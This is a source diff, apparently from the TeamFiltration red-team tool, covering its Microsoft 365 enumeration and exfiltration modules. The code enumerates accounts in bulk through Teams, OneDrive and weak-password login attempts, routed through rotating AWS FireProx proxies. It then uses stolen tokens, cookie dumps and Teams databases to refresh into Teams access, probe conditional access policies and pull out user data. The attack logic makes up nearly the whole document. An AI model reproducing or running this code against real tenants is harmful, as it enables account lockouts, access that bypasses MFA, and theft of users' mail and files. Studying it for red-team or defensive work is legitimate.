 
+						_databaseHandle.WriteLog(new Log("ENUM", $"Enumerating {userListData.Count()} possible accounts, this will take ~{approcTime} minutes", ""));
 
-                            //We need a skype token to get other stuff
-                            var getSkypeToken = await teamsHandler.SetSkypeToken();
+						var teamsToken = await msolHandler.LoginAttemptFireProx(
+							_globalProperties.TeamFiltrationConfig.SacrificialO365Username,
+							_globalProperties.TeamFiltrationConfig.SacrificialO365Passwords,
+							_globalProperties.GetBaseUrl(),
 
-                            if (getSkypeToken.Item2 != null)
-                            {
-                                _databaseHandle.WriteLog(new Log("ENUM", $"Error getting Skype token: {getSkypeToken.Item2.message}", ""));
-                                Environment.Exit(0);
-                            }
-                            _databaseHandle.WriteLog(new Log("ENUM", $"Loaded {userListData.Count()} usernames", ""));
+							("https://api.spaces.skype.com/", "1fec8e78-bce4-4aaf-ab1b-5451cc387264"));
 
+						if (teamsToken.bearerToken != null)
+						{
 
-                            (Amazon.APIGateway.Model.CreateDeploymentRequest, Models.AWS.FireProxEndpoint, string fireProxUrl) enumUserUrl = _globalProperties.GetFireProxURLObject("https://teams.microsoft.com/api/mt/", (new Random()).Next(0, _globalProperties.AWSRegions.Length));
+							_databaseHandle.WriteLog(new Log("ENUM", $"Successfully got Teams token for sacrificial account", ""));
 
-                            //Perfom an sanity check to make sure we can validate anything for this tenant at all
+							TeamsHandler teamsHandler = new TeamsHandler(teamsToken.bearerToken, _globalProperties);
 
-                            var sanityCheck = await ValidUserWrapperTeams(teamsHandler, "ThisUserShouldNotExist@" + userListData.FirstOrDefault().Split('@')[1], enumUserUrl.fireProxUrl);
-                            if (sanityCheck == true)
-                            {
-                                _databaseHandle.WriteLog(new Log("ENUM", $"Pre-Enum sanity check failed, cannot enum this tenant!", ""));
+							//Pull out objectId's
+							var previusValidAccs = _databaseHandle.QueryValidAccount();
+							if (previusValidAccs.Count() > 0)
+							{
+								_teamsObjectIds = previusValidAccs?.Select(x => x?.objectId).ToList();
+							}
 
-                            }
-                            else
-                            {
 
-                                await userListData.ParallelForEachAsync(
-                                   async user =>
-                                   {
-                                       await ValidUserWrapperTeams(teamsHandler, user, enumUserUrl.fireProxUrl);
-                                   },
-                                   maxDegreeOfParallelism: 300);
-                            }
+							//We need a skype token to get other stuff
+							var getSkypeToken = await teamsHandler.SetSkypeToken();
 
+							if (getSkypeToken.Item2 != null)
+							{
+								_databaseHandle.WriteLog(new Log("ENUM", $"Error getting Skype token: {getSkypeToken.Item2.message}", ""));
+								Environment.Exit(0);
+							}
+							_databaseHandle.WriteLog(new Log("ENUM", $"Loaded {userListData.Count()} usernames", ""));
 
-                            await _globalProperties._awsHandler.DeleteFireProxEndpoint(enumUserUrl.Item1.RestApiId, enumUserUrl.Item2.Region);
 
-                        }
-                        else
-                        {
-                            _databaseHandle.WriteLog(new Log("ENUM", $"Teams enumeration failed, error: {teamsToken.bearerTokenError.error_description}", ""));
+							(Amazon.APIGateway.Model.CreateDeploymentRequest, Models.AWS.FireProxEndpoint, string fireProxUrl) enumUserUrl = _globalProperties.GetFireProxURLObject("https://teams.microsoft.com/api/mt/", (new Random()).Next(0, _globalProperties.AWSRegions.Length));
 
-                        }
-                    }
-                    else
-                    {
-                        _databaseHandle.WriteLog(new Log("ENUM", $"Teams enumeration failed, lack of Sacrificial O365 Username and/or password", ""));
+							//Perfom an sanity check to make sure we can validate anything for this tenant at all
 
-                    }
-                }
-                else if (options.ValidateAccsOneDrive)
-                {
+							var sanityCheck = await ValidUserWrapperTeams(teamsHandler, "ThisUserShouldNotExist@" + userListData.FirstOrDefault().Split('@')[1], enumUserUrl.fireProxUrl);
+							if (sanityCheck == true)
+							{
+								_databaseHandle.WriteLog(new Log("ENUM", $"Pre-Enum sanity check failed, cannot enum this tenant!", ""));
 
-                    var approcTime = (int)Math.Round(TimeSpan.FromSeconds(((double)userListData.Count() / 300)).TotalMinutes);
+							}
+							else
+							{
 
-                    _databaseHandle.WriteLog(new Log("ENUM", $"Enumerating {userListData.Count()} possible accounts, this will take ~{approcTime} minutes", ""));
+								await userListData.ParallelForEachAsync(
+								   async user =>
+								   {
+									   await ValidUserWrapperTeams(teamsHandler, user, enumUserUrl.fireProxUrl);
+								   },
+								   maxDegreeOfParallelism: 300);
+							}
 
 
-                    var sharepoint_endpoint = "sharepoint.com";
-                    var tenant_name = "";
-                    if (args.Contains("--tenant-name"))
-                        tenant_name = args.GetValue("--tenant-name");
+							//await _globalProperties._awsHandler.DeleteFireProxEndpoint(enumUserUrl.Item1.RestApiId, enumUserUrl.Item2.Region);
 
-                    var oneDriveEnumHandler = new OneDriveEnumHandler(_globalProperties, tenant_name, sharepoint_endpoint, userListData.FirstOrDefault().Split('@')[1], _databaseHandle);
+						}
+						else
+						{
+							_databaseHandle.WriteLog(new Log("ENUM", $"Teams enumeration failed, error: {teamsToken.bearerTokenError.error_description}", ""));
 
-                    if (string.IsNullOrEmpty(tenant_name))
-                        await oneDriveEnumHandler.enumTenantName();
+						}
+					}
+					else
+					{
+						_databaseHandle.WriteLog(new Log("ENUM", $"Teams enumeration failed, lack of Sacrificial O365 Username and/or password", ""));
 
-                    //For now let's not use the fireprox endpoints for this method
-                    //(Amazon.APIGateway.Model.CreateDeploymentRequest, Models.AWS.FireProxEndpoint, string fireProxUrl) enumUserUrl = _globalProperties.GetFireProxURLObject("https://teams.microsoft.com/api/mt/", (new Random()).Next(0, _globalProperties.AWSRegions.Length));
+					}
+				}
+				else if (options.ValidateAccsOneDrive)
+				{
 
-                    await userListData.ParallelForEachAsync(
-                       async user =>
-                       {
-                           await ValidUserWrapperOneDrive(oneDriveEnumHandler, user);
-                       },
-                       maxDegreeOfParallelism: 300);
+					var approcTime = (int)Math.Round(TimeSpan.FromSeconds(((double)userListData.Count() / 300)).TotalMinutes);
 
+					_databaseHandle.WriteLog(new Log("ENUM", $"Enumerating {userListData.Count()} possible accounts, this will take ~{approcTime} minutes", ""));
 
 
-                    //await _globalProperties._awsHandler.DeleteFireProxEndpoint(enumUserUrl.Item1.RestApiId, enumUserUrl.Item2.Region);
+					var sharepoint_endpoint = "sharepoint.com";
+					var tenant_name = "";
+					if (args.Contains("--tenant-name"))
+						tenant_name = args.GetValue("--tenant-name");
 
+					var oneDriveEnumHandler = new OneDriveEnumHandler(_globalProperties, tenant_name, sharepoint_endpoint, userListData.FirstOrDefault().Split('@')[1], _databaseHandle);
 
+					if (string.IsNullOrEmpty(tenant_name))
+						await oneDriveEnumHandler.enumTenantName();
 
-                }
-                else if (options.ValidateAccsLogin)
-                {
-                    var approxTime = (int)Math.Round(TimeSpan.FromSeconds((userListData.Count() / 100)).TotalMinutes);
-                    var tempPw = Helpers.Generic.GenerateWeakPasswords().FirstOrDefault();
-                    _databaseHandle.WriteLog(new Log("ENUM", $"Warning, THIS METHOD WILL PRODUCE LOGIN ATTEMPTS AND IF USED FREQUENTLY,MAY LOCKOUT ACCOUNTS!", ""));
-                    _databaseHandle.WriteLog(new Log("ENUM", $"Enumerating {userListData.Count()} accounts with password {tempPw}, this will take ~{approxTime} minutes", ""));
+					//For now let's not use the fireprox endpoints for this method
+					//(Amazon.APIGateway.Model.CreateDeploymentRequest, Models.AWS.FireProxEndpoint, string fireProxUrl) enumUserUrl = _globalProperties.GetFireProxURLObject("https://teams.microsoft.com/api/mt/", (new Random()).Next(0, _globalProperties.AWSRegions.Length));
 
+					await userListData.ParallelForEachAsync(
+					   async user =>
+					   {
+						   await ValidUserWrapperOneDrive(oneDriveEnumHandler, user);
+					   },
+					   maxDegreeOfParallelism: 300);
 
-                    (Amazon.APIGateway.Model.CreateDeploymentRequest, Models.AWS.FireProxEndpoint, string fireProxUrl) enumUserUrl
-                        = _globalProperties.GetFireProxURLObject("https://login.microsoftonline.com", (new Random()).Next(0, _globalProperties.AWSRegions.Length));
 
 
-                    await userListData.ParallelForEachAsync(
-                        async user =>
-                        {
-                            await ValidUserWrapperLogin(msolHandler, user, tempPw, $"https://{enumUserUrl.Item1.RestApiId}.execute-api.{enumUserUrl.Item2.Region}.amazonaws.com/fireprox/common/oauth2/token");
+					//await _globalProperties._awsHandler.DeleteFireProxEndpoint(enumUserUrl.Item1.RestApiId, enumUserUrl.Item2.Region);
 
-                        },
-                        maxDegreeOfParallelism: 100);
 
 
+				}
+				else if (options.ValidateAccsLogin)
+				{
+					var approxTime = (int)Math.Round(TimeSpan.FromSeconds((userListData.Count() / 100)).TotalMinutes);
+					var tempPw = Helpers.Generic.GenerateWeakPasswords().FirstOrDefault();
+					_databaseHandle.WriteLog(new Log("ENUM", $"Warning, THIS METHOD WILL PRODUCE LOGIN ATTEMPTS AND IF USED FREQUENTLY,MAY LOCKOUT ACCOUNTS!", ""));
+					_databaseHandle.WriteLog(new Log("ENUM", $"Enumerating {userListData.Count()} accounts with password {tempPw}, this will take ~{approxTime} minutes", ""));
 
-                    await _globalProperties._awsHandler.DeleteFireProxEndpoint(enumUserUrl.Item1.RestApiId, enumUserUrl.Item2.Region);
-                }
 
+					(Amazon.APIGateway.Model.CreateDeploymentRequest, Models.AWS.FireProxEndpoint, string fireProxUrl) enumUserUrl
+						= _globalProperties.GetFireProxURLObject("https://login.microsoftonline.com", (new Random()).Next(0, _globalProperties.AWSRegions.Length));
 
-            }
-            catch (Exception ex)
-            {
 
-                _databaseHandle.WriteLog(new Log("ENUM", $"SOFT ERROR ENUM  => {ex.Message}", ""));
-            }
+					await userListData.ParallelForEachAsync(
+						async user =>
+						{
+							await ValidUserWrapperLogin(msolHandler, user, tempPw, enumUserUrl.fireProxUrl + "common/oauth2/token");
+						},
+						maxDegreeOfParallelism: 100);
 
-        }
 
 
+					//await _globalProperties._awsHandler.DeleteFireProxEndpoint(enumUserUrl.Item1.RestApiId, enumUserUrl.Item2.Region);
+				}
 
-    }
+
+			}
+			catch (Exception ex)
+			{
+
+				_databaseHandle.WriteLog(new Log("ENUM", $"SOFT ERROR ENUM  => {ex.Message}", ""));
+			}
+
+		}
+
+
+
+	}
 }

--- a/TeamFiltration/TeamFiltration/Modules/Exfiltrate.cs
+++ b/TeamFiltration/TeamFiltration/Modules/Exfiltrate.cs
@@ -32,56 +32,56 @@ using ServiceStack.Text;
 namespace TeamFiltration.Modules
 {
 
-    public class ExifilOptions
-    {
+	public class ExifilOptions
+	{
 
-        public ExifilOptions(string[] args)
-        {
-            if (args.Contains("--owa"))
-                this.OWA = true;
+		public ExifilOptions(string[] args)
+		{
+			if (args.Contains("--owa"))
+				this.OWA = true;
 
-            if (args.Contains("--aad"))
-                this.AAD = true;
+			if (args.Contains("--aad"))
+				this.AAD = true;
 
-            if (args.Contains("--teams"))
-                this.Teams = true;
+			if (args.Contains("--teams"))
+				this.Teams = true;
 
-            if (args.Contains("--jwt-tokens"))
-                this.Tokens = true;
+			if (args.Contains("--jwt-tokens"))
+				this.Tokens = true;
 
-            if (args.Contains("--onedrive"))
-                this.OneDrive = true;
-
-
-            if (args.Contains("--all"))
-            {
-                this.OneDrive = true;
-                this.Teams = true;
-                this.AAD = true;
-                this.OWA = true;
-                this.Tokens = true;
-
-            }
-
-        }
-
-        public bool OneDrive { get; set; } = false;
-        public bool Teams { get; set; } = false;
-        public bool OWA { get; set; } = false;
-        public bool AAD { get; set; } = false;
-        public bool Tokens { get; set; } = false;
+			if (args.Contains("--onedrive"))
+				this.OneDrive = true;
 
 
-    }
-    public class Exfiltrate
-    {
-        private static GlobalArgumentsHandler _globalProperties { get; set; }
-        private static DatabaseHandler _databaseHandler { get; set; }
-        private static MSOLHandler _msolHandler { get; set; }
+			if (args.Contains("--all"))
+			{
+				this.OneDrive = true;
+				this.Teams = true;
+				this.AAD = true;
+				this.OWA = true;
+				this.Tokens = true;
 
-        private static async Task PrepareExfil(SprayAttempt accObject, ExifilOptions exfilOptions, bool skip = false)
-        {
-            /*
+			}
+
+		}
+
+		public bool OneDrive { get; set; } = false;
+		public bool Teams { get; set; } = false;
+		public bool OWA { get; set; } = false;
+		public bool AAD { get; set; } = false;
+		public bool Tokens { get; set; } = false;
+
+
+	}
+	public class Exfiltrate
+	{
+		private static GlobalArgumentsHandler _globalProperties { get; set; }
+		private static DatabaseHandler _databaseHandler { get; set; }
+		private static MSOLHandler _msolHandler { get; set; }
+
+		private static async Task PrepareExfil(SprayAttempt accObject, ExifilOptions exfilOptions, bool skip = false)
+		{
+			/*
              * There are many possible options at this stage
             * 1. Our valid login was blocked by MFA / Conditional access, so we do not have any access token for any resource at this stage
             *   -> We need to enumerate the conditional access policy in order to identify a gap
@@ -91,1732 +91,1733 @@ namespace TeamFiltration.Modules
             *   -> Determine if any has expired ( access token vs refresh token)
             * 3. Token dead / revoked and/or Credentials have changed -> STOP
             */
-            try
-            {
-                bool forceCDAEnum = false;
-
-                //Pull all valid tokens that has been issued on behalf of this user
-                //VALID meaning the refresh token or access_token has not expired
-                List<PulledTokens> cachedTokenList = _databaseHandler.TokensAvailable(accObject).OrderByDescending(x => x.DateTime).ToList();
-
-                //We have valid tokens, let's work with them!
-                if (cachedTokenList.Count() > 0)
-                {
-                    //Future token to be used
-                    (BearerTokenResp bearerToken, BearerTokenErrorResp bearerTokenError) bearerToken = (null, null);
-
-                    //Preferably, we would like an access token for teams
-                    IEnumerable<PulledTokens> teamsToken = cachedTokenList.Where(x => new Uri(x.ResourceUri).Host.Equals("api.spaces.skype.com"));
-
-
-                    //If we have an access token for teams, check if the access_token is still valid, and if not, refresh it
-                    if (teamsToken.Count() > 0)
-                    {
-                        var mostPermissionsTeamsToken = teamsToken.OrderByDescending(x => ((BearerTokenResp)x).scope.Length).FirstOrDefault();
-
-                        //If the access token has expired
-                        if (!Helpers.Generic.IsAccessTokenValid(teamsToken.FirstOrDefault().ResponseData, mostPermissionsTeamsToken.DateTime))
-                        {
-                            //Refresh the token to make sure we have access still
-                            //If this failed the token will be automagicly removed as it's useless
-                            bearerToken = await _msolHandler.RefreshAttempt(
-                                 (BearerTokenResp)mostPermissionsTeamsToken,
-                                 _globalProperties.GetBaseUrl(),
-                                 mostPermissionsTeamsToken.ResourceUri,
-                                 mostPermissionsTeamsToken.ResourceClientId,
-                                 false,
-                                 true
-                                 );
-
-                        }
-                        else
-                        {
-                            //If the access token has not expired, use it
-                            bearerToken.bearerToken = (BearerTokenResp)mostPermissionsTeamsToken;
-                        }
-                    }
-
-
-                    if (bearerToken.bearerToken == null)
-                    {
-
-                        //We don't have Teams, or teams token has expired, get all tokens were access token is valid
-                        IEnumerable<PulledTokens> validAccessTokenTokens = cachedTokenList.Where(x => Helpers.Generic.IsAccessTokenValid(x.ResponseData, x.DateTime));
-
-
-                        //If we do have valid access_tokens 
-                        if (validAccessTokenTokens.Count() > 0)
-                        {
-                            //get the token with the most permissions
-                            //TODO: Make an actual check for the access we need to better identify a access token that makes sense for us
-                            var mostPermissionsAccessToken = validAccessTokenTokens.OrderByDescending(x => ((BearerTokenResp)x).scope.Length).FirstOrDefault();
-
-                            //Pick the first one
-                            bearerToken = ((BearerTokenResp)mostPermissionsAccessToken, null);
-                        }
-                        else
-                        {
-                            //We don't have a token with a valid access token, but maybe we can refresh to get one
-                            IOrderedEnumerable<PulledTokens> mostPermissionsRefreshTokens = cachedTokenList.OrderByDescending(x => ((BearerTokenResp)x).scope.Length);
-
-                            foreach (PulledTokens mostPermissionsRefreshToken in mostPermissionsRefreshTokens)
-                            {
-
-                                //Refresh one
-                                //If this failed the token will be automagicly removed as it's useless
-
-                                //If it works they will be stored in the token database
-                                bearerToken = await _msolHandler.RefreshAttempt(
-                                         (BearerTokenResp)mostPermissionsRefreshToken,
-                                         _globalProperties.GetBaseUrl(),
-                                         mostPermissionsRefreshToken.ResourceUri,
-                                         mostPermissionsRefreshToken.ResourceClientId,
-                                         false,
-                                         true
-                                         );
-                            }
-                        }
-                    }
-
-
-                    //Attempt to exfil
-                    await RefreshExfilAccountAsync(
-                        _globalProperties.OutPutPath,
-                        bearerToken.bearerToken,
-                        exfilOptions,
-                        _msolHandler);
-
-                    return;
-                }
-                //We dont't have any tokens, and we don't have ConditionalAccess, and we have initial response data
-                //This is were a newly compromised user would typically land
-                else if (!accObject.ConditionalAccess && !string.IsNullOrEmpty(accObject.ResponseData))
-                {
-
-                    //No MFA? NICE :) 
-                    //Verify that the token has not expired
-                    if (Helpers.Generic.IsTokenValid(accObject.ResponseData, accObject.DateTime))
-                    {
-
-                        //Parse string into token JSON object
-                        BearerTokenResp bearerToken = JsonConvert.DeserializeObject<BearerTokenResp>(accObject?.ResponseData);
-
-                        //Refresh in order to get an fresh copy as well as store in token database for future
-                        var crossRefresh = await _msolHandler.RefreshAttempt(
-                                 bearerToken,
-                                 _globalProperties.GetBaseUrl(),
-                                 bearerToken.resource,
-                                 accObject.ResourceClientId,
-                                 false,
-                                 true
-                                 );
-
-                        //If this fails, we can remove the responseData, as it's not valid anymore
-                        //Check if it failed
-                        if (crossRefresh.bearerTokenError != null)
-                        {
-                            //Check if the token has been revoked / invalid grant
-                            if (crossRefresh.bearerTokenError.error.Equals("invalid_grant"))
-                            {
-                                //If revoked, we have no need for it, remove it
-                                //TODO: Instead of removing, maybe mark as revoked? We might wanna keep for later
-                                accObject.ResponseData = "";
-                                if (_databaseHandler.UpdateAccount(accObject))
-                                    _databaseHandler.WriteLog(new Log("EXFIL", $"Updated user account token for resource {accObject.Username}", "") { }, true);
-                            }
-                        }
-                        else
-                        {
-                            //Simple refresh into teams?
-                            //Refresh into a new token valid for Teams
-                            //If a valid token for Teams is already in the Database, a token will not be requested
-                            var teamsRefresh = await _msolHandler.RefreshAttempt(
-                                bearerToken,
-                                _globalProperties.GetBaseUrl(),
-                                "https://api.spaces.skype.com/",
-                                "1fec8e78-bce4-4aaf-ab1b-5451cc387264",
-                                true,
-                                true
-                                );
-
-                            //If so, procceed
-                            if (teamsRefresh.bearerToken?.access_token != null)
-                            {
-                                _databaseHandler.WriteLog(new Log("EXFIL", $"Cross-resource-refresh allowed, we can exfil all that things!", "") { }, true);
-                                await RefreshExfilAccountAsync(_globalProperties.OutPutPath, teamsRefresh.bearerToken, exfilOptions, _msolHandler);
-                                return;
-                            }
-                            else
-                            {
-                                //We failed to refresh into Teams,  //We need to enum the conditional access policy
-                                forceCDAEnum = true;
-
-                            }
-
-
-                        }
-
-                    }
-
-                }
-
-                //If we get to this point we need to enum CDA
-                if (accObject.ConditionalAccess || forceCDAEnum)
-                {
-                    //TODO:Do we need to check if this has been ran before?
-
-                    //Conditonal Access, let's enum
-                    _databaseHandler.WriteLog(new Log("EXFIL", $"Attemping to enumerate potential conditional access policy ", "") { }, true);
-
-                    //Enumerate a list of ressources that was can access based on conditional access policy
-                    List<EnumeratedConditionalAccess> enumeratedConditionalAccessList = await EnumerateConditionalAccess(accObject.Username, accObject.Password, _msolHandler, true);
-
-                    //If we got any ressources we can access
-                    if (enumeratedConditionalAccessList.Count() == 0)
-                    {
-                        _databaseHandler.WriteLog(new Log("EXFIL", $"Not able to bypass the conditional access policy :(", "") { }, true);
-                    }
-                    else
-                    {
-                        //Check if we got a Teams access token from that enum
-                        List<PulledTokens> updatedPulledTokens = _databaseHandler.TokensAvailable(accObject);
-
-                        //Let's make all the tokens pretty
-                        List<BearerTokenResp> updatedBearertokens = updatedPulledTokens.Select(x => (BearerTokenResp)x).ToList();
-
-                        //We have NO tokens, let's just end it
-                        if (updatedBearertokens.Count() == 0)
-                        {
-                            _databaseHandler.WriteLog(new Log("EXFIL", $"Unable to bypass Conditional Access policy :/", "") { }, true);
-                            return;
-
-                        }
-
-                        //Do we have a Teams token?
-                        List<BearerTokenResp> teamsToken = updatedBearertokens.Where(x => new Uri(x.resource).Host.Equals("api.spaces.skype.com")).ToList();
-
-                        //If we do NOT have a teams token
-                        if (teamsToken.Count() == 0)
-                        {
-                            //Check if any of the access token we got, can refresh into Teams
-                            foreach (var enumeratedConditionalAccess in enumeratedConditionalAccessList)
-                            {
-                                //Turn that into a bearerToken
-                                BearerTokenResp bearerToken = JsonConvert.DeserializeObject<BearerTokenResp>(enumeratedConditionalAccess?.ResponseData);
-
-                                //Refresh into a new token valid for Teams
-                                //If a valid token for Teams is already in the Database, a token will not be requested
-                                var crossRefresh = await _msolHandler.RefreshAttempt(
-                                    bearerToken,
-                                    _globalProperties.GetBaseUrl(),
-                                    "https://api.spaces.skype.com/",
-                                    enumeratedConditionalAccess.ResourceClientId,
-                                    true,
-                                    true,
-                                    enumeratedConditionalAccess.UserAgent
-                                    );
-
-
-                                //If we did refresh into 
-                                if (crossRefresh.bearerToken?.access_token != null)
-                                {
-                                    _databaseHandler.WriteLog(new Log("EXFIL", $"Cross-resource-refresh allowed, we can exfil all that things!", "") { }, true);
-                                    try
-                                    {
-                                        await RefreshExfilAccountAsync(_globalProperties.OutPutPath, crossRefresh.bearerToken, exfilOptions, _msolHandler);
-                                        return;
-                                    }
-                                    catch (Exception ex)
-                                    {
-                                        break;
-                                    }
-                                }
-                            };
-
-                            //If we get to this point we just need to attempt an exfil with whatever we got
-                            await RefreshExfilAccountAsync(_globalProperties.OutPutPath, updatedBearertokens.FirstOrDefault(), exfilOptions, _msolHandler);
-                        }
-                        else
-                        {
-                            //We have a teams token and can proceed with a refresh!
-                            await RefreshExfilAccountAsync(_globalProperties.OutPutPath, teamsToken.FirstOrDefault(), exfilOptions, _msolHandler);
-                        }
-                    }
-
-
-
-                }
-
-            }
-            catch (Exception ex)
-            {
-                _databaseHandler.WriteLog(new Log("EXFIL", $" SOFT ERROR EXFIL {accObject.Username} => {ex.Message}", "") { }, true);
-            }
-
-        }
-
-        public static async Task ExfiltrateAsync(string[] args, string targetUser = "", DatabaseHandler databaseHandler = null)
-        {
-
-            if (databaseHandler == null)
-                _databaseHandler = new DatabaseHandler(args);
-            else
-                _databaseHandler = databaseHandler;
-
-            _globalProperties = new GlobalArgumentsHandler(args, _databaseHandler, true);
-
-            _msolHandler = new MSOLHandler(_globalProperties, "EXFIL", _databaseHandler);
-
-            var exfilOptions = new ExifilOptions(args);
-
-            if (!Helpers.Generic.AreYouAnAdult())
-                return;
-
-            if (args.Contains("--username") && args.Contains("--password"))
-            {
-
-                var username = args.GetValue("--username");
-                var password = args.GetValue("--password");
-
-
-                await PrepareExfilCreds(username, password, exfilOptions);
-
-            }
-            else if (args.Contains("--roadtools"))
-            {
-                string roadAuthFile = args.GetValue("--roadtools");
-
-                if (File.Exists(roadAuthFile))
-                {
-                    string rawAuthFile = File.ReadAllText(roadAuthFile);
-                    try
-                    {
-
-
-                        RoadToolsAuth roadToolsAuth = JsonConvert.DeserializeObject<RoadToolsAuth>(rawAuthFile);
-                        JwtSecurityTokenHandler jwsSecHandler = new JwtSecurityTokenHandler();
-
-                        JwtSecurityToken jwtSecToken = jwsSecHandler.ReadJwtToken(roadToolsAuth.accessToken);
-                        string userName = Helpers.Generic.GetUsername(jwtSecToken.RawData);
-                        Console.WriteLine($"[+] Exfiltrating data from user {userName}");
-                        await RefreshExfilAccountAsync(
-                          _globalProperties.OutPutPath,
-                          (BearerTokenResp)roadToolsAuth,
-                          exfilOptions,
-                          _msolHandler,
-                          clientId: roadToolsAuth._clientId);
-                    }
-                    catch (JsonException jsonex)
-                    {
-
-                        Console.WriteLine($"[!] Failed to parse RoadTools auth JSON file, is the format correct?");
-                        Console.WriteLine($"{jsonex.Message}");
-                    }
-                    catch (Exception ex)
-                    {
-
-                        Console.WriteLine($"[!] Failed to exfiltrate using RoadTools auth file");
-                        Console.WriteLine($"{ex.Message}");
-                    }
-                }
-
-            }
-            else if (args.Contains("--tokens"))
-            {
-                //JwtTokenHandler
-                JwtSecurityTokenHandler jwsSecHandler = new JwtSecurityTokenHandler();
-
-                var tokenDict = new List<(string username, PulledTokens pulledTokens)>() { };
-
-                //parse input
-                var jwtToken = args.GetValue("--tokens");
-
-
-                //Is the input a file?
-                if (File.Exists(jwtToken))
-                {
-                    var tokensArray = File.ReadAllLines(jwtToken);
-                    foreach (var possibleToken in tokensArray)
-                    {
-                        try
-                        {
-
-                            JwtSecurityToken jwtSecToken = jwsSecHandler.ReadJwtToken(possibleToken);
-                            PulledTokens parsedTokenObject = Helpers.Generic.ParseSingleAccessToken(jwtSecToken);
-                            tokenDict.Add((Helpers.Generic.GetUsername(jwtSecToken.RawData), parsedTokenObject));
-                            _databaseHandler.WriteToken(parsedTokenObject);
-                        }
-                        catch (Exception ex)
-                        {
-
-                            Console.WriteLine($"[!] Failed to parse possible JWT token on line {tokensArray.GetIndex(possibleToken)}");
-                        }
-
-                    }
-                }
-                else
-                {
-                    //Is the input one or many tokens seperated by ,?
-                    var splitCharCount = jwtToken.Count(f => f == ',');
-                    if (splitCharCount > 0)
-                    {
-                        foreach (var possibleJwtToken in jwtToken.Split(","))
-                        {
-                            //Let's attempt to parse this as a single token
-                            try
-                            {
-
-                                JwtSecurityToken jwtSecToken = jwsSecHandler.ReadJwtToken(possibleJwtToken);
-                                PulledTokens parsedTokenObject = Helpers.Generic.ParseSingleAccessToken(jwtSecToken);
-                                tokenDict.Add((Helpers.Generic.GetUsername(jwtSecToken.RawData), parsedTokenObject));
-                                _databaseHandler.WriteToken(parsedTokenObject);
-                            }
-                            catch (Exception ex)
-                            {
-
-                                Console.WriteLine($"[!] Failed to parse a possible JWT token that starts with {possibleJwtToken.Substring(0, 15)}...");
-                            }
-                        }
-                    }
-                    else
-                    {
-                        //Let's attempt to parse this as a single token
-                        try
-                        {
-
-                            JwtSecurityToken jwtSecToken = jwsSecHandler.ReadJwtToken(jwtToken);
-                            PulledTokens parsedTokenObject = Helpers.Generic.ParseSingleAccessToken(jwtSecToken);
-                            tokenDict.Add((Helpers.Generic.GetUsername(jwtSecToken.RawData), parsedTokenObject));
-                            _databaseHandler.WriteToken(parsedTokenObject);
-                        }
-                        catch (Exception ex)
-                        {
-
-                            Console.WriteLine($"[!] Failed to parse possible JWT token ");
-                        }
-                    }
-                }
-
-
-
-                //TODO: Create dummy user to be added into the validUsers database so we can pick up these at an later stage
-                //Tokens are now in Database, let's pick each for each username
-                foreach (var foundToken in tokenDict.Distinct())
-                {
-
-                    Console.WriteLine($"[+] Exfiltrating data from user {foundToken.username}");
-                    await RefreshExfilAccountAsync(
-                      _globalProperties.OutPutPath,
-                      (BearerTokenResp)foundToken.pulledTokens,
-                      exfilOptions,
-                      _msolHandler);
-                }
-
-
-
-            }
-            else if (args.Contains("--cookie-dump"))
-            {
-                Console.WriteLine("[+] Reading cookie dump file");
-                var inputFile = args.GetValue("--cookie-dump");
-
-                if (File.Exists(inputFile))
-                {
-                    List<CookieObject> cookieDumpObjects = new List<CookieObject>();
-                    try
-                    {
-                        var cookieData = File.ReadAllText(inputFile);
-
-                        //Really dumb check / "validation"
-                        if (cookieData.ToLower().Contains("\"host raw\":"))
-                        {
-
-                            //This a dump from FireFox Cookie Quick Manager
-                            List<CookieQuickManagerObject> cookieDumpFireFoxObjects = JsonConvert.DeserializeObject<List<CookieQuickManagerObject>>(cookieData);
-                            cookieDumpObjects = cookieDumpFireFoxObjects.Select(x => (CookieObject)x).ToList();
-                        }
-                        else
-                        {
-                            //This is a dump from SharpChrome
-                            List<SharpChromeCookieObject> cookieDumpFireFoxObjects = JsonConvert.DeserializeObject<List<SharpChromeCookieObject>>(cookieData);
-                            cookieDumpObjects = cookieDumpFireFoxObjects.Select(x => (CookieObject)x).ToList();
-
-                        }
-
-
-                        if (cookieDumpObjects.Count() > 0)
-                            await CookieExfilAccountAsync(_globalProperties.OutPutPath, cookieDumpObjects, exfilOptions, _msolHandler);
-                        else
-                            Console.WriteLine("[!] No cookies found in JSON data");
-                    }
-                    catch (JsonException ex)
-                    {
-                        Console.WriteLine("[!] Failed to deserialize cookie dump file, does the format match SharpChrome's or 'Cookie Quick Manager' output?");
-                        Environment.Exit(0);
-                    }
-
-
-                }
-                else
-                {
-                    Console.WriteLine("[!] Invalid path given, could not find cookie dump!");
-                }
-
-
-            }
-            else if (args.Contains("--teams-db"))
-            {
-                Console.WriteLine("[+] Reading exfiltrated Teams database");
-
-                string filePath = args.GetValue("--teams-db");
-
-                if (File.Exists(filePath) && Helpers.Generic.IsDatabaseFile(filePath))
-                {
-                    string token = Helpers.Generic.ExtractTokensFromTeams(filePath);
-                    if (!string.IsNullOrEmpty(token))
-                    {
-                        JwtSecurityTokenHandler jwsSecHandler = new JwtSecurityTokenHandler();
-
-                        JwtSecurityToken jwtSecToken = jwsSecHandler.ReadJwtToken(token);
-                        PulledTokens parsedTokenObject = Helpers.Generic.ParseSingleAccessToken(jwtSecToken);
-
-                        _databaseHandler.WriteToken(parsedTokenObject);
-
-                        Console.WriteLine($"[+] Exfiltrating data from user {Helpers.Generic.GetUsername(token)}");
-                        await RefreshExfilAccountAsync(
-                          _globalProperties.OutPutPath,
-                          (BearerTokenResp)parsedTokenObject,
-                          exfilOptions,
-                          _msolHandler);
-                    }
-                    else
-                    {
-                        Console.WriteLine("[!] Could not extract useful token from specified Teams database!");
-                    }
-                }
-                else
-                {
-                    Console.WriteLine("[!] Invalid path given, could not find specified Teams database, or the specified file is not a DB file!");
-                }
-            }
-            else if (!string.IsNullOrEmpty(targetUser))
-            {
-                var accObject = _databaseHandler.QueryValidLogins().Where(x => x.AADSSO == false && x.Username.ToLower().Equals(targetUser.ToLower())).FirstOrDefault();
-                await PrepareExfil(accObject, exfilOptions, true);
-            }
-            else
-            {
-                //Query a list of valid logins for users
-                var validLogins = _databaseHandler.QueryValidLogins().Where(x => x.AADSSO == false).ToList();
-
-                //If we have any valid logins
-                if (validLogins.Count() > 0)
-                {
-
-                    int options = 0;
-                    Console.WriteLine("\n[+] You can select multiple users using syntax 1,2,3 or 1-3");
-                    foreach (var loginObject in validLogins)
-                    {
-                        Console.WriteLine($"    |-> {options++} - {loginObject.Username}");
-
-                    }
